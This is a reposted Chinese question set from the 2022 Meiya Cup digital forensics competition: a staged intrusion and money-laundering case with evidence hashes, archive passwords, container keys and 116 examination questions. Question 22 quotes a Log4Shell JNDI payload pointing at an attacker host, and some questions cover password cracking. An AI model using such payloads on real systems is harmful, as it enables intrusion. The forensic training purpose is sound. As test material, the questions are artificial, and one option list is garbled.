2022“美亚杯”第八届中国电子数据取证大赛-团队赛题目

这篇具有很好参考价值的文章主要介绍了2022“美亚杯”第八届中国电子数据取证大赛-团队赛题目。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

2022“美亚杯”第八届中国电子数据取证大赛-团队赛题目 更多网络安全CTF题目,欢迎来polarctf.com来刷题

本人wechat N34939
检材文件下载链接:https://pan.baidu.com/s/1kg8FMeMaj6BIBmuvUZHA3Q?pwd=ngzs
提取码:ngzs
个人赛与团队赛下载文件解压密码:MeiyaCup2022
个人赛解压缩时间:
45min左右
团队赛解压缩时间:
1h20min左右
个人赛加密容器解密密钥

CZDGm#&2_Ns$7wSMn%ZGr7xntcHS7d5uFta#Up9544jx_cvP$uFM7?pTDa*jN&QyFDLS8U%hx$fXN^BY$Xsj+3@F^y#4QFXb*Uq@wLmkCE7?&Yp+nX6s@hKrzpVE%v?&

团队赛加密容器解密密钥

av?5CAXw;&N`X)6)%B>Y<`Gx[IVq<5F;mAQp]b@ftYpF6v,*88~%wF*CS}.w*7"S(,I[gJE((9cwT@zEh2mY$AK[aZzW&JFR<\FE}RC\Gjx[!ec^GrDne]xK)SuUPMWX

I.案件详情

2022年10月,警方收到AGC集团举报表示该公司网络的电邮系统有可疑连接及流量。 经过调查后,警方相信事件与本地一个IP地址有关,于是拘捕了一名男子朗尼 (Rooney),并在他家中检取了一些电脑,网络装置,手机作调查。

2022年10月下旬,两名巡警在街上截查一名男子王景浩(阿浩 KingHo)时, 在他的背包中找到一些从网上下载的制作油漆弹教学材料,阿浩曾作出反抗但最后被制服。经调查后,警员发现阿浩计划於某日向某人投掷油漆弹,警员随后将他拘捕并于他家中检取了一批电脑,手机作调查。深入调查后发现阿浩亦与AGC集团网络被入侵事件有关。

警方的电子数据取证小组在现场作出初步了调查并对涉案装置进行了电子数据取证。请你根据警方的资料,协助将事件经过还原。

II.警方资料

A)与’朗尼’相关的资料

编号 1 朗尼的调查报告
文件路径 Meiya_cup_2022/Group/Report/Rooney/陳朗尼调查报告.pdf
哈希值:
SHA256 FCE56F69C3042BC83B840EE41ED0F81EDAABB71EFA96F24F9BE0D74538791A0A

编号 2 朗尼的手机的电子数据
文件路径 / Meiya_cup_2022/Group/Image/Rooney/Rooney_Mobile
哈希值:
SHA256 E23446D9E5E3E3CCA9EAA4A96BAD00C691E5BA9A1EA73B7386029AF2D01C06AE

编号 3 朗尼计算器的电子数据
文件路径 / Meiya_cup_2022/ Group/Image/Rooney/Rooney_Desktop
哈希值:
SHA256 C42516B67C481887C1D9D4232C586E1A9CA59C3307A51619E8AEDEC21622BBBF

编号 4 朗尼草莓计算器电子数据
文件路径 / Meiya_cup_2022/Group/Image/Rooney/Rooney_Router
哈希值:
SHA256 7B71AE36A91C627952EE1E0D286DF2131C65BC64AB0E79603BB3E74C28765CBD

B)与’AGC’集团相关的资料

编号 5 AGC集团的调查报告
文件路径 Meiya_cup_2022/Group/Report/AGC/助查人士AGC集团调查报告.pdf
哈希值:
SHA256 26A1BD9678363BB8A3AAFCD414872860CBECB7F9C71622485B7FD99E8EE86C24

编号 6 AGC集团员工计算机的电子数据
文件路径 / Meiya_cup_2022/Group/Image/AGC/AGC_Desktop/
哈希值:
SHA256 2E025568EEB157E9139EBF63384B0FC8684A05E581C7B42D205DFA0399C740F1

编号 7 AGC集团服务器的电子数据
文件路径 / Meiya_cup_2022/Group/Image/AGC/AGC_Server/
哈希值:
SHA256 C97400F74B69EC1CD9F4ABE6958E83BFF944284B5971BE820B56C8D574A011C1

编号 8 AGC集团媒体服务器的电子数据
文件路径 / Meiya_cup_2022/Group/Image/AGC/AGC_MediaServer/
哈希值:
MD5 1364b9f0e8f4c1fbb63f23463acb6883

编号 9 AGC集团的PCAP档案
文件路径 / Meiya_cup_2022/Group/Image/AGC/AGC_pcap/
哈希值:
SHA256 8321E090D24A6735904BEC5489B34FB75A4B5564725F2B70CA5587F37DBDD1C4

编号 10 警员调查报告
文件路径 Meiya_cup_2022/Group/Report/AGC/警员调查报告.pdf
哈希值:
SHA256 2C4D9658E63964E1A97A11052FB3B846921ACE30EE0B53D7E7B55D229A8DF316

C)与’王景浩’相关的资料

编号 11 王景浩的调查报告
文件路径 Meiya_cup_2022/Group/Report/KingHo/王景浩调查报告.pdf
哈希值:
SHA256 D64FADC80DF7D0E1F54F85395B78F63FAB9F98ADAECCCAE3E976DB2D532A3616

编号 12 王景浩USB记忆棒的电子数据
文件路径 / Meiya_cup_2022/Group/Image/KingHo/KingHo_USB
哈希值:
SHA256 3B808480FBC29EF7464E42BAC44C7A7166E90F718F265AF95D84E598389A2377

编号 13 王景浩SD咭的电子数据
文件路径 / Meiya_cup_2022/Group/Image/KingHo/KingHo_Memory_Card
哈希值:
SHA256 3FD99E55335B0631069745CBD9BD595B00BEAF2DEA16B0605265C738FB17B6DE

编号 14 王景浩计算机的电子数据
文件路径 / Meiya_cup_2022/Group/Image/KingHo_Macbook
哈希值:
SHA256 FB7CB5E71F8AFC691CF767403549FF6C425094352021136827716C8CB8DBD124

  1. [填空题] 在朗尼手机于2022年9月30日的 ‘WhatsApp’ 对话里,有一段音讯 (Voice Message) 提到王景浩会给朗尼现金多少作为租用 ‘VPN’ 的租金? (以阿拉伯数字回答) (3分)

  2. [填空题] 就AGC集团网络的流媒体服务器 (Media Server),有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)

  3. [填空题] 就AGC集团网络的流媒体服务器,有多少个本地用户曾经成功用 ‘ssh’ (Secure Shell)登录过? (以阿拉伯数字回答) (2分)

  4. [填空题] 就上述的本地用户,成功通过 ‘ssh’ 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)

  5. [单选题] 试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ‘ssh:notty’ 登录该流媒体服务器? (2分)
    A. iamhacker
    B. hacking
    C. hack
    D. hacker
    E. 以上皆非

  6. [填空题] 就该流媒体服务器的本地用户, 有一个用户名是 ‘S’ 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)

  7. [多选题] 该流媒体服务器是有使用Docker容器 (Docker Container) 的,当中包含以下哪个Docker镜像 (Docker Image) ? (3分)
    A. apache2
    B. ubuntu
    C. centos
    D. nginx
    E. hello-world
    F. 以上皆非

  8. [单选题] 就上述的Docker镜像,哪一个镜像在系统上运行中? (2分)
    A. apache2
    B. ubuntu
    C. centos
    D. nginx
    E. hello-world
    F. 以上皆非

  9. [多选题] 该流媒体服务器是使用 ‘WordPress’ 建站 (Create Website) 的, 就 ‘比特币’ 标题, 有以下的电子邮箱地址曾经留有评论? (2分)
    A. cn.wordpress.org
    B. root58462@mail.qq.com
    C. hi456@163.com
    D. root@163.com
    E. user1@localhost.net
    F. 以上皆非

  10. [单选题] 该流媒体服务器里其中一个本地用户是有使用 ‘calendar’ 日历工具的, 日历内曾经提及以下哪个网站? (3分)
    A. https://weibo.com
    B. http://www.baidu.com
    C. https://www.douyin.com
    D. https://youku.com
    E. https://www.binance.com
    F. 以上皆非

  11. [单选题] 该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)
    A. RAID 0
    B. RAIDz2
    C. RAIDz3
    D. RAID 10
    E. RAID 5
    F. 以上皆非

  12. [单选题] 该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)
    A. Jun
    B. Jul
    C. Aug
    D. Sep
    E. Oct
    F. 以上皆非

  13. [填空题] 承上题,拥有该段儿童色情影片的用户名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答) (1分)

  14. [填空题] 就AGC集团网络的流媒体服务器,曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果,该用户所输入的网址是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 https://web3.com,需回答 HTTPSWEB3COM) (2分)

  15. [填空题] 该基本镜像存储池 (pool) 有一个快照 (Snapshot),快照的名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 media/mediapool@abc123,需回答MEDIAMEDIAPOOLABC123) (1分)

  16. [填空题] 就上述所找到的基本镜像存储池快照 (Snapshot),它储存了多少个档案? (以阿拉伯数字回答) (1分)

  17. [单选题] 王景浩的USB记忆棒里有一个 ‘Data’ 文件夹 (Folder),它存有哪一种类型的密钥文件? (1分)
    A. pem
    B. cer
    C. crt
    D. key
    E. 以上皆非

  18. [多选题] 承上题,‘Data’ 文件夹里有一个被加密了的档案,它是被哪一种加密方法加密? (2分)
    A. Symmetric
    B. PGP
    C. Twofish
    D. RSA
    E. Triple DES

  19. [单选题] 尝试将档案解密,该档案属于哪一个类型 (File type)? (2分)
    A. exe
    B. ods
    C. rtf
    D. sql
    E. 以上皆非

  20. [多选题] 承上题,找出以下哪一个名字出现在该档案里? (3分)
    A. Armand To
    B. Adam Smasher
    C. Beverly Kot
    D. Huma Chan
    E. 以上皆非

  21. [单选题] 分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 ‘GET’ 指令,它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)
    A. http://155.137.195.111:8080
    B. http://www.w3.org/2003/05/soap-envelope
    C. http://61.238.217.108:8000
    D. 以上皆非

  22. [单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 ‘POST’ 指令,它在 ‘HTML Form’ 项目的 ‘uname’ 栏所输入的字符串是什么? (1分)
    A. root
    B. ${jndi:ldap://61.238.217.108:1389/a}
    C. application/x-www-form-urlencoded
    D. password

  23. [单选题] AGC服务器10.0.66.184收到IP地址61.238.217.108的 ‘POST’ 指令后,它执行了哪些行动? (2分)
    A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口
    B. 于IP地址61.238.217.108下载了Exploit.class
    C. 使用端口49264连接IP地址61.238.217.108发送同步要求
    D. 以上皆是

  24. [填空题] 在上述行动后,IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)

  25. [多选题] AGC服务器10.0.66.184里有一个AGC目录 (Directory),它的子目录 (Sub Directory) 包含以下哪一个? (2分)
    A. Accounting
    B. Picture
    C. Staff
    D. Sambashare
    E. Retail

  26. [多选题] 入侵者迸入AGC服务器10.0.66.184后,他成功执行以下哪些指令? (2分)
    A. 檢视了readme.txt内容
    B. 删除了三个档案
    C. 删除了一个目录 (Directory)
    D. 替档案改名
    E. 建立了两个txt档案

  27. [单选题] 入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename),这个档案的原来名称是什么? (1分)
    A. cGhvdG9zT0Zyb2NreQ==
    B. Finanical.xls
    C. readme.txt
    D. anonymous

  28. [单选题] 承上题,该档案原档的建立日期是什么? (2分)
    A. 2022-10-21 08:10:30 (UTC+0)
    B. 2022-10-21 16:19:39 (UTC+0)
    C. 2022-10-22 08:10:30 (UTC+0)
    D. 2022-10-22 14:22:06 (UTC+0)
    E. 2022-10-22 16:19:39(UTC+0)

  29. [单选题] 承上题,该档案的SHA-256哈希值是什么? (3分)
    A. a6eef1… …27364c
    B. 54785c… …fe86f0
    C. 961f2b… …647d55
    D. a00e6c… …d0eaab
    E. 以上皆非

  30. [多选题] 通过取证调查结果迸行分析 (包括但不限于以上问题及情节),以下哪项关于王景浩的推断是正确的? (5分)
    A. 曾经采用他的计算机入侵AGC集团网络
    B. 传播儿童色情物品
    C. 于AGC集团取得大量客户资料
    D. 通过VPN取得Rooney家里的IP地址
    E. 企图更改AGC集团的网页

  31. [单选题] 分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ,它的实際安装时间是什么? (以时区UTC+8回答) (3分)
    A. 2022-09-26 14:35:17
    B. 2022-09-26 21:35:17
    C. 2022-09-27 05:35:17
    D. 2022-10-05 03:52:15
    E. 2022-10-05 11:52:15

  32. [单选题] AGC-CS计算机里的 ‘Acrobat DC’ 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (1分)
    A. 2022-09-28 19:01:40
    B. 2022-09-28 07:18:33
    C. 2022-08-30 19:01:40
    D. 2022-08-30 07:18:33

  33. [单选题] AGC-CS计算机里的用户 ‘Carson’ 链接了一个网络磁盘机 (Network Drive),在下列哪一个档案有相关资料? (2分)
    A. \Users\Carson\NTUSER.DAT
    B. \Users\admin\NTUSER.DAT
    C. \Windows\System32\config\SYSTEM
    D. \Windows\System32\config\SOFTWARE
    E. \Windows\System32\config\SECURITY

  34. [单选题] 承上题,用户 ‘Carson’ 连接的网络磁盘机的IP地址是什么? (1分)
    A. \192.168.182.134
    B. \192.168.182.134\photo
    C. \192.168.182.134\share
    D. \192.168.182.134\AGC
    E. \192.168.182.134\AGC photo

  35. [填空题] 分析计算机里的电邮数据,当中包含嫌疑人王景浩可能的居住地址,请回答他住址的楼层 (以阿拉伯数字回答) (1分)

  36. [填空题] 承上题,王景浩使用的信用卡号码最后四位数字是? (1分)

  37. [填空题] AGC-CS计算机用户 ‘Carson’ 曾经收到一个电邮并通过里面的链结下载了一个可疑的 ‘Word’ 文件,那个档案的档案名是什么? (不要输入 ‘.’,以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (1分)

  38. [单选题] 承上题,分析该 ‘Word’ 文件,它的可能用途是? (3分)
    A. 访问一个网站
    B. 记录键盘操作
    C. 把档案加密
    D. 改变桌面壁纸
    E. 关闭计算机

  39. [单选题] AGC-CS计算机里有一个名为 ‘admin’ 的用户,它是在何时被建立的? (以时区UTC+8回答) (1分)
    A. 2022-09-28
    B. 2022-09-29
    C. 2022-09-30
    D. 2022-10-01
    E. 以上皆非

  40. [填空题] 黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)

  41. [填空题] 黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件,这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)

  42. [填空题] 承上题,黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 (‘Media Access Control’ Address - MAC Address) 并存到一个名为 ‘ip.txt’ 的档案。 当中 ‘192.168.182.130’ 计算机的MAC地址是什么? (不要输入 ‘:’ 或 ‘-’ ,以大写英文及阿拉伯数字回答) (3分)

  43. [填空题] AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 ‘admin’ 曾经采用记事本 (Notepad) 打开了一个文字档案,这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)

  44. [单选题] 黑客除了通过 ‘RDP’ 外,还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)
    A. VNC
    B. Teamviewer
    C. Anydesk
    D. Splashtop Business Access
    E. RemotePC

  45. [填空题] AGC_Server里LVM (Logical Volume Management 逻辑卷轴管理) 的 VG (Volume Group 卷组) ‘pve’ 共有多少PE (Physical Extent 物理块) ? (以阿拉伯数字回答) (1分)

  46. [填空题] AGC_Server里LVM 的 LV(邏輯卷)“pve-data” 使用了多少百分比的空間? (不用填寫 ‘%’,以阿拉伯数字回答) (3分)

  47. [多选题] AGC_Server里的 ‘Proxmox’ 虚拟化环境 (Virtual Environment - VE) 有哪一个用户? (2分)
    A. root
    B. VM_admin
    C. sysadmin
    D. acl
    E. tss

  48. [填空题] 分析 ‘VM’ (虚拟机) 编号 ‘111’ AGC网站的网页服务器日志,当中记录了黑客曾向该服务器发出多少次與远程代码執行 (Remote Code Execution) 的网络攻击? (以阿拉伯数字回答) (2分)

  49. [单选题] 哪一个IP地址尝试登录’VM’ (虚拟机) 编号 ‘111’ 失败次数最多? (1分)
    A. 38.242.130.207
    B. 218.92.0.206
    C. 43.142.93.22
    D. 121.202.141.105
    E. 61.238.217.108

  50. [填空题] 黑客在入侵 ‘VM’ 编号 ‘111’ 后,打算涂改AGC公司的网页,黑客在传送相关档案时所用的端口 (Port) 是什么? (以阿拉伯数字回答) (3分)

  51. [多选题] 根据 ‘VM’ 编号 ‘111’ 里的网页服务器 (Web Server) 的设定,访客可从下列哪个网页地址访问这个服务器? (2分)
    A. localhost
    B. www.ag.com.shop
    C. www.agcom.shop
    D. agcom.shop
    E. www.agcom.com

  52. [填空题] 黑客曾入侵 ‘VM’ 编号 ‘111’ 里的电邮系统 ‘Xeams’,他登录的时间是? (以unix时间戳回答,格式如:1665049779010) (2分)

  53. [单选题] 黑客在入侵后盗用AGC员工电邮户口及冒充AGC员工回复了电邮给客户,发出这封电邮的操作系统 (Operating System) 及电邮软件 (Mail Agent) 是什么? (2分)
    A. Mac OS X 10.15 rv:102.0 Thunderbird/102.3.0
    B. Mac OS X 10.15 rv:102.0 Thunderbird/91.13.1
    C. Mac OS X 10.11 rv:91.0 Thunderbird/91.13.1
    D. Mac OS X 10.11 rv:60.0 Thunderbird/60.9.1
    E. Windows 10 Pro Outlook 2016

  54. [单选题] 黑客在 ‘Proxmox’ 里留下了一个被加密了的程序 (Program),在解密后它的SHA-256哈希值 (Hash Value) 是什么? (2分)
    A. C89D7A… …8C4E76
    B. C7141F… …64BF65
    C. E9433E… …1A5134
    D. 45CE1C… …79BD4A
    E. 0ACAA5… …AB7ECE

  55. [填空题] 承上题,分析程序代码 (Program Code),上述程序的档案名应该是什么? (不要输入 ‘.’,以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (3分)

  56. [单选题] 于虚拟机 ‘VM’ 编号 ‘111’ 里的档案 ‘\srv\samba\share\AGCphoto\DSC01139.JPG’ ,照片中出现的街道名称是? (2分)
    A. 河背街
    B. 沙咀道
    C. 众安街
    D. 香车街
    E. 川龙街

  57. [单选题] 王景浩的计算机使用什么文件系统 (File System) ? (1分)
    A. exFAT
    B. APFS
    C. HFS
    D. HFS+

  58. [单选题] 王景浩计算机的操作系统 (Operating System) 版本是什么? (1分)
    A. 10.4.11
    B. 10.9.5
    C. 10.10.5
    D. 10.11.6

  59. [填空题] 王景浩的计算机当前有多少个用户 (包括访客 ‘Guest’ )? (以阿拉伯数字回答) (1分)

  60. [填空题] 王景浩的计算机里有一个用户被删除,被删除的用户名称是什么? (以大写英文回答) (1分)

  61. [填空题] 王景浩的计算机有多少个 ‘聚焦’ 的搜索记録 (Spotlight Search) ? (以阿拉伯数字回答) (1分)

  62. [单选题] 当用户设置了自动登录 (Auto Login) 后,王景浩计算机的操作系统会产生哪个档案? (2分)
    A. manifest.plist
    B. info.plist
    C. PasswordPanel.strings
    D. kcpassword

  63. [单选题] 王景浩计算机的登录密码 (Login Password) 是什么? (2分)
    A. 1qa@WS3ed
    B. 3ed R F 5 t g C . 5 t g Y H 7 u j D . 2 w s RF5tg C. 5tg^YH7uj D. 2ws RF5tgC.5tgYH7ujD.2wsRF6yh

  64. [单选题] 在王景浩的计算机里,他最后使用哪个电邮地址登录 ‘iCloud’ 账号? (2分)
    A. kinghoo0w0@gmail.com
    B. wonghoo588@yahoo.com
    C. kingho726@aol.com
    D. kinghoo0w0@yahoo.com

  65. [多选题] 王景浩计算机里的手机备份 (iTunes Backup) 包含哪些iOS版本? (2分)
    A. 12.5.6
    B. 15.4
    C. 15.5
    D. 16.0.3

  66. [填空题] 王景浩曾经将一台 iPhone 6 连接他的计算机,请问它最后的连接时间是什么? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)

  67. [单选题] 苹果手机备份的密码 (iTunes Backup Encryption Password) 会记录在什么档案? (2分)
    A. Info.plist
    B. privacy.json
    C. Manifest.plist
    D. PasswordPanel.strings

  68. [多选题] 以下哪种工具可以用作破解密码? (1分)
    A. Passware
    B. John The Ripper
    C. HashCat
    D. Password Recovery Toolkit

  69. [多选题] 通过 ‘hashcat’ 破解 ‘iTunes Backup’ 密码需要制订一个 ‘txt’ 档案,若该备份的手机iOS版本是10以上,需要按照下列哪个提示字符 (String) 的数据去制订这个 ‘txt’ 档案? (3分)
    A. WPKY
    B. ITER
    C. SALT
    D. DPIC
    E. DPSL

  70. [填空题] 王景浩采用了4位数字加密了他的iPhone XR的备份,分析它的密码是什么? (以阿拉伯数字回答) (3分)

  71. [填空题] 最后一次连上王景浩计算机的3D打印机的IP 地址是什么? (不要输入答案中的 ‘.’,以阿拉伯数字回答) (2分)

  72. [填空题] 3D打印机最后一次在王景浩的计算机尝试打印的时间? (以时区UTC+8回答) (2分)

  73. [单选题] 最后一次经由王景浩计算机打印的3D图档案名字是什么? (2分)
    A. CE3_balljoint_extender.gcode
    B. um3-penguin-real-mini-keychain-merged-tpu.gcode
    C. CE3_Prancer.gcode
    D. CE3_2020-psu-atx-mount.gcode

  74. [单选题] 王景浩计算机的Safari浏览器的默认搜索引擎 (Default Search Engine) 是什么? (2分)
    A. 百度
    B. 谷歌
    C. 360
    D. Safari

  75. [单选题] 分析王景浩计算机的数据,王景浩的比特币钱包 (Bitcoin Wallet) 地址是什么? (2分)
    A. bc1quw… …zpzjzt
    B. bc1qm… …5f7n9g
    C. bc1q79… …h4sq52
    D. bc1qsl… …je7hkk

  76. [单选题] AGC公司员工 ‘Carson’ 有一个由公司发给他的电邮账户,分析王景浩的计算机数据并找出 ‘Carson’ 的电邮账户密码。 (2分)
    A. AGC2020@pw
    B. AGC2012@PW
    C. AGC2020@hkg
    D. AGC2021@PW

  77. [填空题] 王景浩曾经冒充AGC公司员工 ‘Carson’ 发送电邮给AGC 客户,这封电邮的 ‘Message-ID’ 是什么? 回答它的首8位数值。(以大写英文和阿拉伯数字回答,如 4GEF90GD) (2分)
    E44F4376
    保存
    标记本题

  78. [多选题] 王景浩采用计算机里的哪种工具进入和盗取AGC公司的数据? (2分)
    A. Teamviewer
    B. OpenVPN
    C. Remote Desktop Manager
    D. Tor Browser

  79. [多选题] 王景浩在AGC公司盗取了下列什么类型的档案? (2分)
    A. ost
    B. xlsx
    C. jpg
    D. docx

  80. [填空题] 王景浩的计算机于2022年9月29日曾经接上一个虚拟专用网络 (Virtual Private Network - VPN),这个VPN的IP地址是什么? (不要输入答案中的 ‘.’,以阿拉伯数字回答) (2分)

  81. [填空题] 装置 ‘「KingHoo」的iPhone’ 的蓝牙媒体访问控制地址 (MAC Address) 是什么? (不要输入答案中的 ‘:’ 或 ‘-’ ,以大写英文及阿拉伯数字回答) (1分)

  82. [单选题] 王景浩何时将 ‘小宝’ 加为iPhone XR的手机联络人 (Contact) ? (以时区UTC +8回答) (1分)
    A. 2022年07月14日
    B. 2022年07月15日
    C. 2022年07月16日
    D. 2022年07月17日
    E. 2022年07月18日
    标记本题

  83. [单选题] 王景浩的iPhone XR显示他的汇丰银行户口于2022年9月19日收到多少存款? (1分)
    A. HKD298.8
    B. HKD344.7
    C. HKD396
    D. HKD543
    E. HKD465.1

  84. [单选题] 王景浩的iPhone XR没有收藏 (Bookmark) 哪家音响品牌的网页? (1分)
    A. KEF
    B. EDIFIER
    C. BOSE
    D. YAMAHA
    E. Bowers & Wilkins

  85. [单选题] 王景浩的iPhone XR手机记录了他曾于2022年8月26日试飞无人机, 当天试飞的地点在哪里? (2分)
    A. 大埔海滨
    B. 启德
    C. 数码港
    D. 西环
    E. 将军澳

  86. [单选题] 王景浩于2022年8月26日试飞无人机的总飞行时间 (Total Flight Time) 多久? (2分)
    A. 6分58秒
    B. 8分10秒
    C. 9分6秒
    D. 11分1秒
    E. 15分33秒

  87. [多选题] 王景浩用 iPhone XR 拍了一张照片’IMG_0012.HEIC’,那照片什么地方曾被修改? (3分)
    A. 拍摄时间
    B. 经纬度
    C. 时区
    D. 档案名称
    E. 拍摄装备

  88. [填空题] 承上题,那张照片修改后的经纬度是什么? (不要输入答案中的 ‘.’,将经纬度合并回答。 如 22.2846135 114.1739116,需回答 2228461351141739116) (3分)

  89. [单选题] 朗尼草莓 (Raspberry) 计算机操作系统的主机名称 (hostname) 是什么? (1分)
    A. OpenWrt
    B. admin
    C. root
    D. AsusRt
    E. DDwrt

  90. [多选题] 以下哪项对于朗尼草莓计算机操作系统的描述是正确的? (2分)
    A. LAN地址是 192.168.1.24
    B. 提供点对点隧道协议 (Point-to-Point Tunneling Protocol - PPTP) VPN服务
    C. WIFI登录密码为’OpenWrt’
    D. 提供网络时间协议 (NTP) 服务
    E. 时区设置相等于UTC+8

  91. [多选题] 承上题,‘VPN’ 服务器的IP地址及端口 (Port) 是什么? (2分)
    A. IP地址 61.238.217.108
    B. IP地址 192.168.8.1
    C. IP地址 103.10.12.106
    D. 端口 33248
    E. 端口 1194
    F. 端口 1701

  92. [填空题] 朗尼草莓计算机操作系统设定了一个档案来储存系统的 ‘log_file’ ,档案名称是什么? (不要输入 ‘.’,以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (2分)

  93. [单选题] 承上题,检视上述的档案,当中有几个IP地址曾经成功登录这个系统的 ‘VPN’ 服务? (3分)
    A. 1
    B. 2
    C. 3
    D. 4
    E. 0

  94. [单选题] 承上题,检视上述的档案,当中有几个IP地址曾经尝试以 ‘root’ 登入装置但因密码错误而不成功? (2分)
    A. 2
    B. 4
    C. 5
    D. 6
    E. 8

  95. [填空题] 根据装置的过往记录,‘log_file’ 是设在 ‘usr/rooney/’ 的哪个已被删除的子文件夹里 (Sub Directory)? (以大写英文回答) (3分)

  96. [填空题] 王景浩 SD 记忆卡 (SD Memory Card) 的储存容量有多少个字节 (Byte) ? (以阿拉伯数字回答) (1分)

  97. [单选题] 检视记忆卡上硬盘分区表 (Partition Table) 资讯,记忆卡共有多少个分区 (Partition) ? (1分)
    A. 1
    B. 2
    C. 3
    D. 4
    E. 0

  98. [单选题] 检视记忆卡上硬盘分区表资讯,第二个分区的分区代码 (Partition Code) 是什么? (1分)
    A. 07
    B. AF
    C. 0C
    D. 2B
    E. 01

  99. [多选题] 记忆卡的档案不能被读取,记忆卡受损的原因包括? (2分)
    A. 目录项结构 (Directory Entry) 受损
    B. 启动扇区表 (Master Boot Record) 受损
    C. 文件分配表 (File Allocation Table - FAT) 受损
    D. 引导扇区 (Boot Sector) 受损
    E. 以上各项皆是

  100. [填空题] 承上题,通过分析及手动恢复还原,记忆卡里有多少个出錯的情况出现? (以阿拉伯数字回答) (3分)

  101. [多选题] 记忆卡第一个文件系统 (File System) 中有一个图片档案,它的SHA-256哈希值是 ‘F7E003781456D2E01CFE0EB46988D5BB433ADF9841164BBB90BAC67C0C9B21AF’。该档案显示了哪些影像? (2分)
    A. 人
    B. 山
    C. 汽车
    D. 交通灯
    E. 天空

  102. [单选题] 检视记忆卡的数据,在2022年10月9日约中午12时5分至12时15分之间的录像 (Video) 中,曾经出现哪一个IP地址? (2分)
    A. 61.238.217.108
    B. 155.137.190.123
    C. 192.168.1.66
    D. 185.200.100.242
    E. 213.104.156.111

  103. [填空题] 恢复还原后的记忆卡中,第二个文件系统显示有多少个空闲簇 (Free Cluster)? (以阿拉伯数字回答) (2分)

  104. [填空题] 记忆卡第一个文件系统中有一个视频档,它的SHA-256哈希值是 ‘847E1E5FEF64B49C8D689DC3537D619B87666619A7C1EF0CC821153641847C19’,这个视频的档数据存在文件系统 (File System) 的最后的簇号 (Last Cluster Number) 是什么? (以阿拉伯数字回答) (2分)

  105. [单选题] 尝试分析记忆卡数据結構受损的原因,通过合适的方法把数据恢复到原本没有出错的状况,记忆卡的SHA-256哈希值是什么? (3分)
    A. E63DF0… …8627D3
    B. 3FD99E… …17B6DE
    C. 3BADAA… …666A8F
    D. BBB211… …E00710
    E. AA9E81… …2C04FE

  106. [单选题] 朗尼的计算机有什么软件可以创建比特币钱包 (Bitcoin Wallet)? (1分)
    A. MetaMask
    B. Electrum
    C. Trezor
    D. 以上皆非

  107. [填空题] 朗尼通过比特币替王景浩清洗黑钱,分析朗尼的计算机及手机,朗尼收取王景浩黑钱的比特币地址 (Bitcoin Address) 是什么? (以大写英文及阿拉伯数字回答) (1分)

  108. [单选题] 朗尼收取王景浩多少比特币作为清洗黑钱的费用? (1分)
    A. 1%
    B. 4%
    C. 7%
    D. 10%
    E. 15%

  109. [单选题] 朗尼的计算机里有一个没被加密的比特币钱包,它的回复种子 (Recovery Seed) 不包含哪一个英文字? (1分)
    A. oppose
    B. area
    C. twice
    D. roast

  110. [单选题] 朗尼的计算机里有多少个加密了 (Encrypted) 的比特币钱包? (1分)
    A. 1
    B. 2
    C. 3
    D. 4
    E. 5

  111. [单选题] 朗尼将加密了的比特币钱包的密码存在他计算机的一个档案里,这个档案的副档名是什么? (以大写英文及阿拉伯数字回答) (3分)
    A. DMG
    B. PDF
    C. ASD
    D. ZIP
    E. PNG

  112. [单选题] 朗尼在手机里有一个加密了的比特币钱包,他采用什么应用程序把该钱包里的黑钱转换成另一种加密货币? (2分)
    A. Safepal
    B. Metamask
    C. Changelly
    D. Opensea

  113. [单选题] 承上题,这次转换加密货币的日期和时间是什么? (以时区UTC+8回答) (2分)
    A. 2022-10-07 10:29时
    B. 2022-10-07 11:06时
    C. 2022-10-07 11:07时
    D. 2022-10-07 13:54时

  114. [单选题]朗尼在计算机里采用什么浏览器 (Browser) 及在什么日期时间在他的计算机安装 ‘MetaMask’ ? (以时区UTC+8回答) (1分)
    A. Chrome 2022-08-25 12:35时
    B. Chrome 2022-10-07 14:29时
    C. Firefox 2022-08-25 12:35时
    D. Firefox 2022-10-07 14:29时

  115. [单选题] 朗尼在计算机里所创建的非同质化通证 (Non-Fungible Token - NFT) 使用哪一个种区块链 (Blockchain) 技术? (1分)
    A. Ethereum
    B. Polygon
    C. Solana
    D. Arbitrum
    E. Klaytn

  116. [单选题] 朗尼在什么日期时间把计算机中创建的非同质化通证 (NFT) 放售? (以时区UTC+8回答) (2分)
